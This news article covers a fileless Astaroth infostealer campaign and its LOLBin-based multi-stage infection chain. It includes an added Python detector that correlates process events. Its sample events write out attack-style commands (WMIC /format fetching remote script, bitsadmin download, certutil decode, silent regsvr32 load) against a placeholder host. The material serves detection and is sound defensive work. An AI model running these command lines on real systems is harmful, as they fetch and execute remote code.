Researchers on the Microsoft Defender ATP Research Team have detected a fileless malware campaign that drops the information-stealing Astaroth Trojan directly into the memory of infected computers.

Astaroth is a Trojan and information stealer capable of collecting sensitive information such as user credentials from its victims through a keylogger module, interception of operating system calls, and clipboard monitoring.

Astaroth is also known for abusing living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to stealthily download and install malware payloads in the background.

We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf — Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019

The malware campaign discovered by the Microsoft Defender ATP Research Team uses several fileless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that led potential victims to an LNK file.

After being double-clicked, the "LNK file causes the execution of the WMIC tool with the '/Format' parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool."

The malicious payloads downloaded in the background are all Base64-encoded and are decoded on the compromised systems using the legitimate Certutil tool, yielding four DLLs that are then loaded with the help of the Regsvr32 tool.

The loaded DLL file will subsequently load a second DLL in memory that will reflectively load a third one, designed to decrypt and inject yet another DLL into Userinit. This fourth DLL acts as a proxy which will reflectively load a fifth DLL into memory using process hollowing.

Multi-stage infection process

This fifth and last DLL file is the final Astaroth infostealer Trojan malware payload that will collect and exfiltrate various types of sensitive info from its victims to command-and-control (C2) servers controlled by the attackers.
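The chain described above is made entirely of legitimate Windows tools, so the detection opportunity lies in the unusual way they are invoked and in their occurring together on one host. The following is an added example, not code from the Microsoft report or from the Astaroth analysis: a small Python correlator that classifies constructed process-creation events (Sysmon-style, with host, image path and command line) against the four LOLBin stages named in the article (WMIC with a remote `/Format` source, Bitsadmin transfers, Certutil decoding, silent Regsvr32 loads) and raises an alert when a host shows two or more distinct stages within a short window. The event format, rule regexes, hostnames, file paths and the `example.invalid` URLs are all assumptions made for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# Not taken from the report; the paths, hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    {"ts": "2019-07-08T10:00:01", "host": "ws01",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"https://example.invalid/stage.xsl"'},
    {"ts": "2019-07-08T10:00:05", "host": "ws01",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority foreground "
                "https://example.invalid/a.txt C:\\Users\\Public\\a.txt"},
    {"ts": "2019-07-08T10:00:09", "host": "ws01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.dll"},
    {"ts": "2019-07-08T10:00:12", "host": "ws01",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s C:\\Users\\Public\\a.dll"},
    # Benign use of certutil on another host: a single, normal invocation
    # that should not match any rule and must not produce an alert.
    {"ts": "2019-07-08T10:05:00", "host": "ws02",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify C:\\certs\\server.cer"},
]

# Each rule: (stage label, regex on the lowercased image path,
#             regex on the lowercased command line). The labels follow the
# order in which the article describes the stages.
RULES = [
    ("wmic_format_remote",   r"\\wmic\.exe$",      r"/format[:\s]\s*\"?https?://"),
    ("bitsadmin_download",   r"\\bitsadmin\.exe$", r"/transfer\b|/download\b"),
    ("certutil_decode",      r"\\certutil\.exe$",  r"-decode\b|-decodehex\b"),
    ("regsvr32_silent_load", r"\\regsvr32\.exe$",  r"(^|\s)/s\b"),
]
STAGE_ORDER = [label for label, _, _ in RULES]


def classify(event):
    """Return the stage label matching one event, or None if no rule fires."""
    image = event["image"].lower()
    cmdline = event["cmdline"].lower()
    for label, image_re, cmd_re in RULES:
        if re.search(image_re, image) and re.search(cmd_re, cmdline):
            return label
    return None


def correlate(events, window=timedelta(minutes=10)):
    """Group matched events per host and return {host: [stages]} for hosts
    that show at least two distinct stages within `window` of the first hit.
    Stages are listed in the order they were observed."""
    per_host = defaultdict(list)
    for ev in events:
        label = classify(ev)
        if label is not None:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), label))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        first_ts = hits[0][0]
        stages = []
        for ts, label in hits:
            if ts - first_ts <= window and label not in stages:
                stages.append(label)
        if len(stages) >= 2:
            alerts[host] = stages
    return alerts


def is_full_chain(stages):
    """True when every stage the article names appears, in the described order."""
    return stages == STAGE_ORDER


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        severity = "full chain" if is_full_chain(stages) else "partial chain"
        print(f"{host}: {severity} -> {' > '.join(stages)}")
```

A single Certutil or Regsvr32 invocation is common on a healthy fleet, which is why the correlator keys on the combination rather than on any one tool; this is the "bag of money moving by itself" observation from the report turned into a rule. In production the same logic would read from an EDR or SIEM feed instead of the inline list, and the window and thresholds would be tuned to the environment.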

"It’s interesting to note that at no point during the attack chain is any file run that’s not a system tool. This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity," added the researchers.

Microsoft's researchers describe only the initial and execution stages of the malware attack in their report given that they only focused on how the Trojan infection was detected and blocked by Microsoft Defender ATP.

The defensive features and technologies Microsoft Defender ATP used to stop the infection are laid out in a stage-by-stage graph of the protections that identified and blocked the Astaroth infection on affected Windows computers.

Blocking Astaroth's fileless techniques

The Microsoft Defender ATP Research Team also enumerates the techniques used at each stage of the Astaroth fileless malware attack and the Windows tools abused to stealthily advance the infection on compromised systems.

As Microsoft Defender ATP Research's Andrea Lelli concluded, "abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would."

Back in February, Cybereason observed another Astaroth campaign that abused security and anti-malware software, living-off-the-land techniques, and living-off-the-land binaries (LOLbins) to steal information from European and Brazilian targets.

Cofense's Phishing Defense Center (PDC) also spotted a malspam campaign distributing Astaroth in September 2018 and exclusively targeting South American victims, with around 8,000 machines potentially compromised within a single week of attacks.

Update July 09: Added info on the Astaroth campaign discovered by Cofense in 2018.